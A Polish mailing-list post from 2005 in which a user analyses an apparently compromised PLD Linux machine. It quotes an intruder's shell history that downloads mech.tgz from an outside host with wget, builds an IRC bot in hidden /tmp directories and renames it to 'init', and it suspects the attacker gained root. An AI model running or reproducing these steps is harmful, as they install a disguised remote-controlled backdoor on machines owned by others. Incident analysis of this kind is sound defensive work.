PLD nie chce wystartowac

Lukasz "S-K" Jarochowski L.Jarochowski w sanity.int.pl
Czw, 17 Lut 2005, 01:33:19 CET

Paweł Nawrocki napisał(a):
> dokladny wyciag wyglada tak:

> passwd
> cd /tmp
> mkdir .sen";"
> cd .sen";"
> mkdir .sen
> cd .sen
> wget muistule.home.ro/root/mech.tgz
> tar xvzf mech.tgz
> cd ls
> cd ls
> ./configure
> make clean install
> rm -rf mech.set
> vi mech.set
> mv mech init
> [...]

Dziwne, ten mech.tgz to energy mech, czyli IRC bot. Nasłuchuje na porcie,
który ustawiasz w mech.set. Łączy się z kanałami, które również masz w
mech.set. Po stelnetowaniu się don niego prosi o nickname i hasło.

hmm. muszę pogmerać trochę w kodzie, a teraz śpiący jestem. Jutro zobaczę co
to jest.

Pozdrawiam
ŁJ

PS: obawiam się, że gość mógł zdobyć root'a

--
Wszędzie słyszę krzyk. Cierpień nieustająca melodia....
GG:0x4BE039                  lukasz < w > sanity.int.pl